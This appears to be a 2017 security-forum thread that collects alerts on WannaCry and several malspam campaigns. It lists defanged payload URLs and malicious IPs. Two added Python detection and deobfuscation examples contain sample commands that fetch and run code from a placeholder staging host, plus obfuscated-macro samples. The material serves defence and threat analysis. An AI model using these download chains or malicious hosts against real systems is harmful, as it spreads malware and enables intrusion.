WannaCry Ransomware, Fake 'invoice' SPAM
FYI...
Indicators Associated With WannaCry Ransomware
- https://www.us-cert.gov/ncas/alerts/TA17-132A
Last revised: May 15, 2017 - "... According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours... Initial reports indicate the hacker or hacking group behind the WannaCry campaign is gaining access to enterprise servers either through Remote Desktop Protocol (RDP) compromise or through the exploitation of a critical Windows SMB vulnerability. Microsoft released a security update for the MS17-010* vulnerability on March 14, 2017. Additionally, Microsoft released patches for Windows XP, Windows 8, and Windows Server 2003 operating systems on May 13, 2017. According to open sources, one possible infection vector is via phishing emails...
* https://technet.microsoft.com/en-us/.../ms17-010.aspx
March 14, 2017
The WannaCry ransomware received and analyzed by US-CERT is a loader that contains an AES-encrypted DLL. During runtime, the loader writes a file to disk named “t.wry”. The malware then uses an embedded 128-bit key to decrypt this file. This DLL, which is then loaded into the parent process, is the actual Wanna Cry Ransomware responsible for encrypting the user’s files. Using this cryptographic loading method, the WannaCry DLL is never directly exposed on disk and not vulnerable to antivirus software scans...
Precautionary measures to mitigate ransomware threats include:
- Ensure anti-virus software is up-to-date.
- Implement a data back-up and recovery plan to maintain copies of sensitive or proprietary data in a separate and secure location. Backup copies of sensitive data should not be readily accessible from local networks.
- Scrutinize -links- contained in -e-mails- and do -not- open -attachments- included in unsolicited e-mails.
- Only download software – especially free software – from sites you know and trust.
- Enable automated patches for your operating system and Web browser..."
(More detail at the us-cert URL at the top of this post.)
WannaCry/WannaCrypt Ransomware Summary
- https://isc.sans.edu/diary.html?storyid=22420
2017-05-15
___
> http://blog.talosintelligence.com/20...acry.html#more
May 12, 2017 - "... Umbrella* prevents DNS resolution of the domains associated with malicious activity..."
* https://umbrella.cisco.com/
... aka 'OpenDNS' - FREE:
>> https://www.opendns.com/setupguide/#/?new=home-free
Test -after- setups: https://welcome.opendns.com/
___
Fake 'invoice' SPAM - delivers pdf attachment jaff ransomware
- https://myonlinesecurity.co.uk/more-...liver-malware/
15 May 2017 - "An email pretending to be an invoice coming from random senders with a PDF attachment that drops a malicious macro enabled word doc...
Update: confirmed as Jaff ransomware (VirusTotal 5/61*) (Payload Security**)...
Screenshot: https://myonlinesecurity.co.uk/wp-co...nt-malspam.png
... An alternative docm file that was extracted confirms it to be Jaff ransomware; it downloads
ecuamiaflowers .com/hHGFjd encrypted txt (Payload Security[3]) (VirusTotal 13/56[4]) (JoeSandbox[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4...is/1494846406/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
47.91.107.213
3] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
107.180.14.32
47.91.107.213
4] https://www.virustotal.com/en/file/f...is/1494844454/
5] https://jbxcloud.joesecurity.org/analysis/271421/1/html
ecuamiaflowers .com: 107.180.14.32: https://www.virustotal.com/en/ip-add...2/information/
> https://www.virustotal.com/en/url/b5...5814/analysis/
h552terriddows .com: 47.91.107.213: https://www.virustotal.com/en/ip-add...3/information/
> https://www.virustotal.com/en/url/5c...2c85/analysis/
Fake 'invoice', 'pdf attachments' SPAM
FYI...
Fake 'invoice' SPAM - downloads Cerber ransomware
- https://myonlinesecurity.co.uk/blank...liver-malware/
16 May 2017 - "... an empty/blank email with the subject of 'Re: invoice 28769' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment that contains another zip that in turn contains a .js file... downloads Cerber ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...voice28769.png
... I am reliably informed[1] that with a couple of minor fixes to correct the malware developers' mistakes this downloads Cerber ransomware from
hxxp ://mdnchdbde .pw/search.php which delivers a file 1 (VirusTotal 6/59*) (Payload Security**)... 'certain that they will fix it in the next malspam run. These criminal gangs often send a small spam run out to “test the waters” and when they don’t get any expected result they double check & fix the errors ready for the next spam run.
262647732.zip extracts to 27000_packed.zip, which in turn extracts to 27000.js
Current Virus total detections 0/57[3]: Payload Security[4] Joebox[5] - none of the online sandboxes managed to get any download location or malware content from the .js file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://twitter.com/Techhelplistcom/...50538112016385
* https://www.virustotal.com/en/file/6...is/1494912080/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts (1088)
3] https://www.virustotal.com/en/file/0...is/1494910036/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
5] https://jbxcloud.joesecurity.org/analysis/271922/1/html
mdnchdbde .pw: 35.163.27.202: https://www.virustotal.com/en/ip-add...2/information/
> https://www.virustotal.com/en/url/99...809c/analysis/
___
Fake 'pdf attachments' SPAM - delivers Jaff ransomware
- https://myonlinesecurity.co.uk/pdf-p...ff-ransomware/
16 May 2017 - "... series of emails with pdf attachments that drop a malicious macro enabled word doc is an email with the subject of 'Emailing: 2650032.pdf' (random numbers) pretending to come from random names at your-own-email-address that delivers Jaff ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...650032_pdf.png
2650032.pdf - Current Virus total detections 8/54*: Payload Security**... drops EYRCUD.docm
(VirusTotal 8/59***) (Payload Security[4])... downloads an encrypted txt file from
http ://personalizar .net/Nbiyure3 which is converted by the script to galaperidol8.exe ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8...is/1494926923/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213
*** https://www.virustotal.com/en/file/4...is/1494927173/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213
personalizar .net: 81.88.57.70: https://www.virustotal.com/en/ip-add...0/information/
> https://www.virustotal.com/en/url/2e...74c2/analysis/
Fake 'Secure Message' SPAM, Adobe phish
FYI...
Fake 'Secure Message' SPAM - delivers trickbot
- https://myonlinesecurity.co.uk/fake-...vers-trickbot/
17 May 2017 - "An email with the subject of 'You have received a new Bankline Secure Message' pretending to come from Bankline RSA but actually coming from a look-a-like domain Bankline RSA <SecureMessage@ banklinersa .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-co...re-message.png
... criminals sending these have registered various domains that look like genuine bank domains. Normally there are 3 or 4 newly registered domains that imitate the bank or some message sending service that can easily be confused with a legitimate organisation in some way that send these. So far we have only found 1 domain today banklinersa .co.uk. As usual they are registered via Godaddy as registrar and for a change the emails are sent via rackspace hosting not the usual citynetwork AB in Sweden. They are currently using IP numbers 104.130.29.210, 172.99.115.203, 172.99.115.216, 172.99.115.23, 104.239.169.15, 104.130.29.243, 104.130.29.245, 172.99.115.29...
SecureMessage.doc - Current Virus total detections 4/56*. Payload Security** downloads from
http ://ocysf .org/wp-content/GktpotdC7dyTH1aoroa.png which of course is -not- an image file but a renamed .exe file that gets -renamed- to a .exe and autorun (VirusTotal 10/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e...is/1495019899/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
50.87.146.185
107.22.214.64
95.104.2.225
192.157.238.15
*** https://www.virustotal.com/en/file/b...is/1495019988/
ocysf .org: 50.87.146.185: https://www.virustotal.com/en/ip-add...5/information/
> https://www.virustotal.com/en/url/a2...6f8a/analysis/
___
Adobe account - Phish
- https://myonlinesecurity.co.uk/adobe...ext-data-urls/
17 May 2017 - "... 'thought this was going to be some newer malware delivery method, but it is only -phishing- for email credentials, which of course is also extremely serious and very bad.
NOTE: This phishing scam only works in Google Chrome. Internet Explorer will not open data:text/html urls and gives a 'cannot display' page message. Firefox refuses to display anything - just a white screen with the original url in the address bar...
Screenshot: https://myonlinesecurity.co.uk/wp-co...hing-email.png
This email has a genuine PDF attachment that contains a blurred out image of an invoice with the prompt to view the Secured PDF Online Document on Adobe:
> https://myonlinesecurity.co.uk/wp-co...ce1246_pdf.png
-If- you click on the blurred image you get a pop up warning about links. When you follow the link inside the pdf it sends you to http ://tiny .cc/tis7ky which immediately -redirects- to
http ://qualifiedplans .com/administrator/components/com_smartformer/plugins/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/phmho/
where it downloads/opens a data:text url that displays a web page on your computer -not- an external site looking like:
> https://myonlinesecurity.co.uk/wp-co.../timed_out.png
After you press OK you get what looks-like an Adobe Business sign in page with what looks-like a download button. I inserted the usual set of fake details & pressed download, expecting some sort of malware to appear, but no it just -bounced- me on to the genuine Adobe page while your stolen data is sent to http ://setas2016 .com/image/catalog/Katalog/files/pageConfig/PDF3/index/adobe.php
With a bit of digging around we have discovered the complete phish is also hosted on http ://setas2016 .com/image/catalog/Katalog/files/pageConfig ...
> https://myonlinesecurity.co.uk/wp-co...be_sign_in.png
The data:text/html file is available for download via Payload Security*. It is in the extracted files section named urlref_httptiny .cctis7ky ..."
* https://www.hybrid-analysis.com/samp...ironmentId=100
setas2016 .com: 87.118.140.114: https://www.virustotal.com/en/ip-add...4/information/
> https://www.virustotal.com/en/url/49...fab9/analysis/
___
ICS-ALERT-17-135-01A
Indicators Associated With WannaCry Ransomware (Update A)
> https://ics-cert.us-cert.gov/alerts/...ERT-17-135-01A
Original release date: May 15, 2017 | Last revised: May 16, 2017
"... updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site..."
(More detail at the URL above.)
Fake 'receipt', 'Reminder' SPAM
FYI...
Fake 'receipt' SPAM - delivers Jaff ransomware
- https://myonlinesecurity.co.uk/more-...yments-emails/
25 May 2017 - "... emails with pdf attachments that drop a malicious macro enabled word doc is an email with various subjects along the line of 'receipt, payment, payment receipt' etc. (random numbers) pretending to come from donotreply@ random email addresses and companies that delivers Jaff ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...ceipt-4830.png
P4830.pdf - Current Virus total detections 12/56*. Payload Security** drops ELMIRJX.doc
(VirusTotal 4/23[3]) (Payload Security[4]) downloads an encrypted txt file from
http ://dreamybean .de/TrfHn4 which should be converted by the script to bruhadson8.exe (unfortunately payload security is showing this as a tiny data file, so something is going wrong there and there must be an anti-analysis element to the malware). There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d...is/1495710733/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.169.145.160
3] https://www.virustotal.com/en/file/b...is/1495710997/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
81.169.145.160
dreamybean .de: 81.169.145.160: https://www.virustotal.com/en/ip-add...0/information/
> https://www.virustotal.com/en/url/6f...1cf5/analysis/
> https://www.virustotal.com/en/url/ad...75f3/analysis/
___
Fake 'Reminder' SPAM - RTF file exploits deliver malware
- https://myonlinesecurity.co.uk/fake-...liver-malware/
25 May 2017 - "... RTF files this time using the CVE-2017-0199* vulnerability that was fixed in April 2017** and again extra added protections by the May 2017 security updates***. If you haven’t got round to applying these essential patches yet, then go & do it NOW...
* https://nvd.nist.gov/vuln/detail/CVE-2017-0199
** https://portal.msrc.microsoft.com/en.../CVE-2017-0199
*** https://portal.msrc.microsoft.com/en...a-000d3a32fc99
... email with the subject of '2nd Reminder Final Demand – Notice of Legal Intention' pretending to come from creditcontrol@ bookatable .com with a malicious word doc attachment eventually delivers sharik/smoke loader after a convoluted download system involving .hta files and PowerShell...
Screenshot: https://myonlinesecurity.co.uk/wp-co...able-email.png
294616_05152017.rtf - Current Virus total detections 28/57[1]. Payload Security[2] downloads an HTA file from
http :// 185.162.8.231 :64646/logo.doc (VirusTotal 0/57[3]) which in turn uses powershell to download
http :// 185.162.8.231 :64646/00001.exe (VirusTotal 48/59[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/c...is/1494977406/
2] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
185.162.8.231: https://www.virustotal.com/en/ip-add...1/information/
> https://www.virustotal.com/en/url/e8...fd1a/analysis/
> https://www.virustotal.com/en/url/24...55f4/analysis/
3] https://www.virustotal.com/en/file/d...is/1494854940/
4] https://www.virustotal.com/en/file/5...is/1495445391/
5] https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
185.141.25.27
193.104.215.58
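Added example, not part of this post or of the myonlinesecurity.co.uk write-up: the RTF -> HTA -> PowerShell -> .exe chain above leaves a distinctive process tree (an Office application spawning mshta.exe, which spawns powershell.exe). The Python below runs that check over Sysmon-style process-creation records; every event, host, path and timestamp in it is constructed sample data, and the staging host name is a placeholder.

```python
"""Flag Office -> script-host -> PowerShell process chains in Sysmon-style
Event ID 1 (process creation) records. Sample data is constructed."""
import json
from typing import Iterable

# Office applications that should rarely spawn script hosts or shells.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children typical of the .hta / PowerShell / .js download stages seen in malspam.
SCRIPT_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample records (JSON lines); hosts, paths and times are invented.
SAMPLE_LOG = "\n".join([
    r'{"EventID":1,"UtcTime":"2017-05-25 10:00:01","Image":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"WINWORD.EXE 294616_05152017.rtf"}',
    r'{"EventID":1,"UtcTime":"2017-05-25 10:00:05","Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE","CommandLine":"mshta.exe http://staging-host.invalid:64646/logo.doc"}',
    r'{"EventID":1,"UtcTime":"2017-05-25 10:00:06","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\mshta.exe","CommandLine":"powershell.exe -w hidden -c <download stage>"}',
    r'{"EventID":1,"UtcTime":"2017-05-25 10:00:07","Image":"C:\\Windows\\splwow64.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE","CommandLine":"splwow64.exe 8192"}',
    r'{"EventID":1,"UtcTime":"2017-05-25 10:03:00","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE","CommandLine":"cmd.exe /c start mbtrf.exe"}',
])

def image_name(path: str) -> str:
    """Lowercase basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def parse_events(log: str) -> Iterable[dict]:
    """Yield one dict per non-empty JSON line."""
    for line in log.splitlines():
        if line.strip():
            yield json.loads(line)

def detect_office_script_chains(events: Iterable[dict]) -> list[dict]:
    """Return one alert per Office app spawning a script host or shell, and per
    mshta.exe handing off to PowerShell (the HTA stage described in the post)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent, child = image_name(ev["ParentImage"]), image_name(ev["Image"])
        if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
            rule = "office-spawned-script-host"
        elif parent == "mshta.exe" and child == "powershell.exe":
            rule = "mshta-spawned-powershell"
        else:
            continue  # explorer -> winword and winword -> splwow64 are normal
        alerts.append({"time": ev["UtcTime"], "rule": rule, "parent": parent,
                       "child": child, "cmdline": ev.get("CommandLine", "")})
    return alerts

def run_sample() -> list[dict]:
    """Apply the detection to the constructed sample log."""
    return detect_office_script_chains(parse_events(SAMPLE_LOG))

if __name__ == "__main__":
    for a in run_sample():
        print(f'{a["time"]} {a["rule"]}: {a["parent"]} -> {a["child"]} | {a["cmdline"]}')
```

The same two rules apply unchanged to the zipped .js (wscript.exe) and macro-driven (cmd.exe) lures elsewhere in this thread; the benign explorer -> WINWORD and WINWORD -> splwow64 records are left alone.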
Fake 'documents', 'Notification' SPAM
FYI...
Fake 'documents' SPAM - xls attachment delivers malware
- https://myonlinesecurity.co.uk/docum...known-malware/
30 May 2017 - "An email with the subject of 'documents' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment delivers malware... Some subjects in this malspam campaign include ...
inv. payment
documents
Screenshot: https://myonlinesecurity.co.uk/wp-co...ent-austin.png
61759684.xls - Current Virus total detections 6/56*: Payload Security** wasn’t able to decode or decrypt the macro but a very quick & easy manual examination shows downloads from
http ://cautiousvirus .com/mbtrf.exe (VirusTotal 7/60[3]) (Payload Security[4])... The macro in the xls document is trivially encoded by using reverse strings... Opening the XLS attachment gives this -fake- invoice:
> https://myonlinesecurity.co.uk/wp-co...759684_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5...is/1496135720/
** https://www.hybrid-analysis.com/samp...ironmentId=100
3] https://www.virustotal.com/en/file/2...f973/analysis/
4] https://www.hybrid-analysis.com/samp...ironmentId=100
cautiousvirus .com: 54.91.240.28: https://www.virustotal.com/en/ip-add...8/information/
> https://www.virustotal.com/en/url/38...12c0/analysis/
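Added example, not code from the post or from the myonlinesecurity.co.uk analysis: the xls macro above hides its download URL with reversed string literals, and a few lines of Python undo that during manual triage by rewriting each StrReverse("...") literal, folding "..." & "..." concatenations (including VBA line continuations), and then pulling out any URL. The macro below is a constructed sample that only mimics that technique; its domain and path are placeholders.

```python
"""Undo the reversed-string encoding used by the xls macro above and recover
the download URL. SAMPLE_MACRO is constructed, not the real macro."""
import re

# StrReverse("literal") with a plain (quote-free) VBA string literal.
STRREV = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.IGNORECASE)
# "a" & "b", optionally split across lines with the VBA continuation " _".
CONCAT = re.compile(r'"([^"]*)"\s*&\s*_?\s*"([^"]*)"')
URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)

# Constructed sample: reversed host, path and drop location (placeholders).
SAMPLE_MACRO = r'''
Sub Auto_Open()
    Dim u As String, p As String
    u = StrReverse("dilavni.tsoh-erawlam//:ptth") & _
        StrReverse("exe.frtbm/")
    p = StrReverse("exe.frtbm\pmeT\:C")
    Call Fetch(u, p)
End Sub
'''

def deobfuscate(vba: str) -> str:
    """Return the macro with every StrReverse() literal reversed in place and
    adjacent literal concatenations folded into single strings."""
    out = STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', vba)
    while True:  # fold "a" & "b" & "c" pairwise until nothing changes
        folded = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if folded == out:
            return out
        out = folded

def extract_urls(vba: str) -> list[str]:
    """Deobfuscate, then collect the distinct URLs that appear in literals."""
    return sorted(set(URL.findall(deobfuscate(vba))))

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_MACRO))
    print(extract_urls(SAMPLE_MACRO))
```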
___
Fake 'Notification' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-...ivers-malware/
30 May 2017 - "An email with the subject of 'Notification of direct debit of fees' pretending to come from HM Land Registry but actually coming from a look-alike domain... with a malicious word doc attachment... -spoof- of a well known company, bank or public authority delivering malware...
Screenshot: https://myonlinesecurity.co.uk/wp-co...it-of-fees.png
Opening the word doc (in protected mode where it is safe) gives this which tries to convince you it is genuine:
> https://myonlinesecurity.co.uk/wp-co...gistry-doc.png
apl053017_045894595.doc - Current Virus total detections 5/56*. Payload Security** shows a download from
http ://200.7.105.13 /jpon13.exe (VirusTotal 7/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2...is/1496147244/
** https://www.hybrid-analysis.com/samp...ironmentId=100
Contacted Hosts
200.7.105.13
184.87.218.172
185.141.25.27
*** https://www.virustotal.com/en/file/7...is/1496137829/
200.7.105.13: https://www.virustotal.com/en/ip-add...3/information/
> https://www.virustotal.com/en/url/58...37cb/analysis/